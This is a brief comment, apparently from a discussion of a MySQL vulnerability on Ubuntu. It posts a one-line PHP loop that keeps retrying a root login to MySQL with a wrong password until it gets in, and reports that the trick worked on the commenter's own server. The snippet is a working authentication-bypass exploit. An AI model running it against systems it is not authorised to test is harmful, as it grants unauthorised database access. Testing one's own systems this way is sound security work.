Comment on Security vulnerability in MySQL ubuntuComments−Limes10214y<?php while(true) if(mysql_connect("localhost", "root", "password")) exit("connected with password: password");I am sad to say it worked on my Ubuntu server :(
Comments
<?php while(true) if(mysql_connect("localhost", "root", "password")) exit("connected with password: password");
I am sad to say it worked on my Ubuntu server :(